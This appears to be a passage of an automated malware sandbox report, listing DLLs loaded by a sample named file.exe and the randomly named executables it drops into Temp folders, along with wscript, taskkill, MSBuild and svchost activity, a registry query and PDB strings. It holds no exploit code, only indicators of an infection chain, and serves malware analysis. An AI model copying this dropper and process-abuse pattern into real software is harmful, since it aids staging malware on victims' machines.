                          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
                          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
                          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
                          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeSection loaded: apphelp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeSection loaded: winmm.dll
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeSection loaded: winhttp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeSection loaded: webio.dll
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeSection loaded: mswsock.dll
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeSection loaded: iphlpapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeSection loaded: winnsi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeSection loaded: sspicli.dll
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeSection loaded: dnsapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeSection loaded: rasadhlp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeSection loaded: fwpuclnt.dll
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeSection loaded: schannel.dll
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeSection loaded: mskeyprotect.dll
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeSection loaded: ntasn1.dll
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeSection loaded: ncrypt.dll
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeSection loaded: ncryptsslp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeSection loaded: msasn1.dll
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeSection loaded: cryptsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeSection loaded: rsaenh.dll
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeSection loaded: cryptbase.dll
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeSection loaded: gpapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeSection loaded: dpapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeSection loaded: kernel.appcore.dll
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeSection loaded: uxtheme.dll
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeSection loaded: wbemcomn.dll
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeSection loaded: amsi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeSection loaded: userenv.dll
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeSection loaded: profapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeSection loaded: version.dll
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\Users\user\AppData\Local\Temp\1003344001\0d8313073f.exeSection loaded: apphelp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1003344001\0d8313073f.exeSection loaded: winmm.dll
                          Source: C:\Users\user\AppData\Local\Temp\1003344001\0d8313073f.exeSection loaded: sspicli.dll
                          Source: C:\Users\user\AppData\Local\Temp\1003344001\0d8313073f.exeSection loaded: wininet.dll
                          Source: C:\Users\user\AppData\Local\Temp\1003344001\0d8313073f.exeSection loaded: rstrtmgr.dll
                          Source: C:\Users\user\AppData\Local\Temp\1003344001\0d8313073f.exeSection loaded: ncrypt.dll
                          Source: C:\Users\user\AppData\Local\Temp\1003344001\0d8313073f.exeSection loaded: ntasn1.dll
                          Source: C:\Users\user\AppData\Local\Temp\1003344001\0d8313073f.exeSection loaded: iertutil.dll
                          Source: C:\Users\user\AppData\Local\Temp\1003344001\0d8313073f.exeSection loaded: windows.storage.dll
                          Source: C:\Users\user\AppData\Local\Temp\1003344001\0d8313073f.exeSection loaded: wldp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1003344001\0d8313073f.exeSection loaded: profapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1003344001\0d8313073f.exeSection loaded: kernel.appcore.dll
                          Source: C:\Users\user\AppData\Local\Temp\1003344001\0d8313073f.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\Users\user\AppData\Local\Temp\1003344001\0d8313073f.exeSection loaded: winhttp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1003344001\0d8313073f.exeSection loaded: mswsock.dll
                          Source: C:\Users\user\AppData\Local\Temp\1003344001\0d8313073f.exeSection loaded: iphlpapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1003344001\0d8313073f.exeSection loaded: winnsi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1003344001\0d8313073f.exeSection loaded: urlmon.dll
                          Source: C:\Users\user\AppData\Local\Temp\1003344001\0d8313073f.exeSection loaded: srvcli.dll
                          Source: C:\Users\user\AppData\Local\Temp\1003344001\0d8313073f.exeSection loaded: netutils.dll
                          Source: C:\Users\user\AppData\Local\Temp\1003344001\0d8313073f.exeSection loaded: cryptbase.dll
                          Source: C:\Users\user\AppData\Local\Temp\1003344001\0d8313073f.exeSection loaded: dpapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1003344001\0d8313073f.exeSection loaded: dnsapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1003344001\0d8313073f.exeSection loaded: rasadhlp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1003344001\0d8313073f.exeSection loaded: fwpuclnt.dll
                          Source: C:\Users\user\AppData\Local\Temp\1003344001\0d8313073f.exeSection loaded: ntmarta.dll
                          Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
                          Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dll
                          Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
                          Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dll
                          Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dll
                          Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dll
                          Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dll
                          Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dll
                          Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dll
                          Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
                          Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dll
                          Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dll
                          Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
                          Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dll
                          Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dll
                          Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dll
                          Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dll
                          Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dll
                          Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dll
                          Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dll
                          Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dll
                          Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dll
                          Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dll
                          Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dll
                          Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dll
                          Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dll
                          Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dll
                          Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dll
                          Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dll
                          Source: C:\Windows\System32\wscript.exeSection loaded: slc.dll
                          Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dll
                          Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dll
                          Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dll
                          Source: C:\Windows\System32\wscript.exeSection loaded: textshaping.dll
                          Source: C:\Windows\System32\wscript.exeSection loaded: textinputframework.dll
                          Source: C:\Windows\System32\wscript.exeSection loaded: coreuicomponents.dll
                          Source: C:\Windows\System32\wscript.exeSection loaded: coremessaging.dll
                          Source: C:\Windows\System32\wscript.exeSection loaded: ntmarta.dll
                          Source: C:\Users\user\AppData\Local\Temp\1003345001\203f60e481.exeSection loaded: wsock32.dll
                          Source: C:\Users\user\AppData\Local\Temp\1003345001\203f60e481.exeSection loaded: version.dll
                          Source: C:\Users\user\AppData\Local\Temp\1003345001\203f60e481.exeSection loaded: winmm.dll
                          Source: C:\Users\user\AppData\Local\Temp\1003345001\203f60e481.exeSection loaded: mpr.dll
                          Source: C:\Users\user\AppData\Local\Temp\1003345001\203f60e481.exeSection loaded: wininet.dll
                          Source: C:\Users\user\AppData\Local\Temp\1003345001\203f60e481.exeSection loaded: iphlpapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1003345001\203f60e481.exeSection loaded: userenv.dll
                          Source: C:\Users\user\AppData\Local\Temp\1003345001\203f60e481.exeSection loaded: uxtheme.dll
                          Source: C:\Users\user\AppData\Local\Temp\1003345001\203f60e481.exeSection loaded: kernel.appcore.dll
                          Source: C:\Users\user\AppData\Local\Temp\1003345001\203f60e481.exeSection loaded: windows.storage.dll
                          Source: C:\Users\user\AppData\Local\Temp\1003345001\203f60e481.exeSection loaded: wldp.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: version.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: mpr.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: framedynos.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: dbghelp.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: srvcli.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: netutils.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: wbemcomn.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: winsta.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: amsi.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: userenv.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: profapi.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mscoree.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: version.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: vcruntime140_clr0400.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: windows.storage.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wldp.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: profapi.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptsp.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rsaenh.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptbase.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wtsapi32.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: winsta.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: amsi.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: userenv.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: msasn1.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: gpapi.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: version.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: mpr.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: framedynos.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: dbghelp.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: srvcli.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: netutils.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: wbemcomn.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: winsta.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: amsi.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: userenv.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: profapi.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: version.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: mpr.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: framedynos.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: dbghelp.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: srvcli.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: netutils.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: wbemcomn.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: winsta.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: amsi.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: userenv.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: profapi.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: version.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: mpr.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: framedynos.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: dbghelp.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: srvcli.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: netutils.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: wbemcomn.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: winsta.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: amsi.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: userenv.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: profapi.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: version.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: mpr.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: framedynos.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: dbghelp.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: srvcli.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: netutils.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: wbemcomn.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: winsta.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: amsi.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: userenv.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: profapi.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: esent.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: mi.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: webio.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: es.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dll
                          Source: C:\Users\user\AppData\Local\Temp\1003346001\8a0ff7e068.exeSection loaded: apphelp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1003346001\8a0ff7e068.exeSection loaded: winmm.dll
                          Source: C:\Users\user\AppData\Local\Temp\1003346001\8a0ff7e068.exeSection loaded: windows.storage.dll
                          Source: C:\Users\user\AppData\Local\Temp\1003346001\8a0ff7e068.exeSection loaded: wldp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1003346001\8a0ff7e068.exeSection loaded: mscoree.dll
                          Source: C:\Users\user\AppData\Local\Temp\1003346001\8a0ff7e068.exeSection loaded: kernel.appcore.dll
                          Source: C:\Users\user\AppData\Local\Temp\1003346001\8a0ff7e068.exeSection loaded: version.dll
                          Source: C:\Users\user\AppData\Local\Temp\1003346001\8a0ff7e068.exeSection loaded: vcruntime140_clr0400.dll
                          Source: C:\Users\user\AppData\Local\Temp\1003346001\8a0ff7e068.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Users\user\AppData\Local\Temp\1003346001\8a0ff7e068.exeSection loaded: sspicli.dll
                          Source: C:\Users\user\AppData\Local\Temp\33QCBA038D3K2VF7AVBGWF5K.exeSection loaded: apphelp.dll
                          Source: C:\Users\user\AppData\Local\Temp\33QCBA038D3K2VF7AVBGWF5K.exeSection loaded: winmm.dll
                          Source: C:\Users\user\AppData\Local\Temp\33QCBA038D3K2VF7AVBGWF5K.exeSection loaded: windows.storage.dll
                          Source: C:\Users\user\AppData\Local\Temp\33QCBA038D3K2VF7AVBGWF5K.exeSection loaded: wldp.dll
                          Source: C:\Users\user\AppData\Local\Temp\33QCBA038D3K2VF7AVBGWF5K.exeSection loaded: mscoree.dll
                          Source: C:\Users\user\AppData\Local\Temp\33QCBA038D3K2VF7AVBGWF5K.exeSection loaded: kernel.appcore.dll
                          Source: C:\Users\user\AppData\Local\Temp\33QCBA038D3K2VF7AVBGWF5K.exeSection loaded: version.dll
                          Source: C:\Users\user\AppData\Local\Temp\33QCBA038D3K2VF7AVBGWF5K.exeSection loaded: vcruntime140_clr0400.dll
                          Source: C:\Users\user\AppData\Local\Temp\33QCBA038D3K2VF7AVBGWF5K.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Users\user\AppData\Local\Temp\33QCBA038D3K2VF7AVBGWF5K.exeSection loaded: sspicli.dll
                          Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32Jump to behavior
                          Source: Window RecorderWindow detected: More than 3 window changes detected
                          Source: C:\Users\user\AppData\Local\Temp\1003334001\Fwkdsz.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                          Source: file.exeStatic file information: File size 1894400 > 1048576
                          Source: file.exeStatic PE information: Raw size of uqbleicu is bigger than: 0x100000 < 0x19cc00
                          Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: MSBuild.exe, 00000012.00000002.2960053340.0000000005530000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: \??\C:\Windows\exe\MSBuild.pdbo source: MSBuild.exe, 00000012.00000002.2927279861.0000000000FF6000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: C:\Windows\System.pdbpdbtem.pdb source: MSBuild.exe, 00000012.00000002.2960053340.0000000005530000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: my_library.pdb source: 0d8313073f.exe, 0000000D.00000003.2559813189.000000000533B000.00000004.00001000.00020000.00000000.sdmp, 0d8313073f.exe, 0000000D.00000002.2983236159.000000006C191000.00000002.00000001.01000000.0000001A.sdmp, 0d8313073f.exe, 0000000D.00000002.2922718430.000000000063C000.00000040.00000001.01000000.0000000D.sdmp
                          Source: Binary string: n0C:\Windows\MSBuild.pdb source: MSBuild.exe, 00000012.00000002.2924990669.0000000000CF9000.00000004.00000010.00020000.00000000.sdmp
                          Source: Binary string: Plofgcjnqfn.pdb source: MSBuild.exe, 00000012.00000002.2945809571.0000000004043000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000012.00000002.2945809571.0000000003D5C000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000012.00000002.2956645688.00000000051F0000.00000004.08000000.00040000.00000000.sdmp, MSBuild.exe, 00000012.00000002.2942794454.0000000002BB1000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: Fwkdsz.exe, 00000007.00000002.2694689971.0000000005CA0000.00000004.08000000.00040000.00000000.sdmp
                          Source: Binary string: oC:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.pdb source: MSBuild.exe, 00000012.00000002.2924990669.0000000000CF9000.00000004.00000010.00020000.00000000.sdmp
